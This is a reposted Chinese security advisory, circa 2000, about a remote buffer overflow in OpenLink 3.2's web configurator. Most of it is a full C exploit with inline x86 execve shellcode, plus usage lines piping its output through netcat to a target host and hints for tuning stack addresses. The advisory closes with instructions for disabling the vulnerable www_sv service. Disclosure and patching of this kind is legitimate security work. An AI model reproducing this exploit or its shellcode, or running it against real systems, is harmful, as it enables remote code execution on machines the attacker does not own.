发信人: hacked()
整理人: williamlong(2000-03-07 19:02:32), 站内信件
|
105 网 络 安 全 中 心 HTTP://WWW.CN105.COM 本文由105成员:XUNDI翻译
回上页
漏洞名称:OpenLink 3.2存在远程缓冲溢出漏洞
漏洞说明:使用在UNIX和NT平台下的OPENLINK3.2都发现存在着远程溢出攻击。此
问题存在于OPENLINK3.2随带的网站配置工具,由于设计的错误调用了strcpy()函
数,而strcpy()存在着不检查边界的漏洞。使用此项漏洞其结果是使用OPENLINK
来执行任何目标主机中的两进制代码。
影响范围:OPENLINK3.2
漏洞代码:
--- cut ---
#include
#include
/*
* Exploit for Openlink's web configurator for Linux/glibc2
* use: pipe through netcat to openlink web port (8000 default)
* ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
* makes www_sv execute /usr/bin/wall if you hit the address right
*
* For informational purposes only. This was written to show that
* there's a problem, not for skr1pt k1dd33z --.
* don't ask me for help on how to use this to crack systems,
* help compiling or anything else. It will only compile on
* an x86 compiler however.
*
* Addresses that work for me: 0xbffffb65 (initial run of the broker)
* 0xbffffb85 (all consecutive attempts)
* probably tied to process ID www_sv runs as;
* first try PIDs were in triple digits, others
* 4 digit PIDs.
*
* If this works, generally no more www_sv processes will be run as a s
ide effect.
*/
void test() {
__asm__("
jmp doit
exploit:
# code basically from Aleph One's smash stacking article, with
# minor mods
popl %esi
movb $0xd0, %al # Get a / character into %al
xorb $0xff, %al
movb %al, 0x1(%esi) # drop /s into place
movb %al, 0x5(%esi)
movb %al, 0x9(%esi)
xorl %eax,%eax # clear %eax
movb %eax,0xe(%esi) # drop a 0 at end of string
movl %eax,0x13(%esi) # drop NULL for environment
leal 0x13(%esi),%edx # point %edx to environment
movl %esi,0xf(%esi) # drop pointer to argv
leal 0xf(%esi),%ecx # point %ecx to argv
movl %esi,%ebx # point ebx to command - 1
inc %ebx # fix it to point to the right place
movb $0xb,%al # index to execve syscall
int $0x80 # execute it
xorl %ebx,%ebx # if exec failed, exit nicely...
movl %ebx,%eax
inc %eax
int $0x80
doit:
call exploit
.string \"..usr.bin.wall.\"
");
}
char *shellcode = ((char *)test) + 3;
char code[1000];
int main(int argc, char *argv[])
{
int i;
int left;
unsigned char where[] = {"\0\0\0\0\0"} ;
int *here;
char *dummy;
long addr;
if (argc > 1)
addr = strtoul(argv[1], &dummy, 0);
else
addr = 0xbffffb85;
fprintf(stderr, "Setting address to %8x\n", addr);
*((long *)where) = addr;
strcpy(code, shellcode);
for (i = 0; i < 64; i++) {
strcat(code, where);
}
printf("GET %s\n", code);
exit(0);
}
--- cut ---
编译后输入./oplwall 0xbffffb85 | nc machine.to.hit 8000,但在命令行中要
调整堆栈地址如(0xbffffb65, 0xbffffb85 或 0xbffffbe5)
此程序将执行WALL--一个向所有登录用户广播消息的命令
修补方法:
在oplaqb.ini中关闭掉www_sv应用程序,在默认状态下此服务被标为连续服务。
在[Persistent Services]的Configurator = www_sv和[www_sv]下的全部语句前
加上分号.
;[Persistent Services]
;Configurator = www_sv
;[www_sv]
;Program = w3config/www_sv
;Directory = w3config
;CommandLine =
;Environment = WWW_SV
;[Environment WWW_SV]
其他信息:
openlink是各种数据库的接口程序,能透明的访问各种数据库的数据资源。能同
时连接你的ODBC, JDBC, UDBC, OLE-DB客户端应用程序和服务各种数据库引擎如
:Oracle, Microsoft SQL Server, DB/2, Informix, Progress, CA-Ingres等,更多信息请
参看网站。
本文由 105网络安全中心 成员翻译
如要转载请注名文章来源,并保持其完整
在您遨游网际的时候,105将为您保驾护航 回上页
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.149.149]
|
|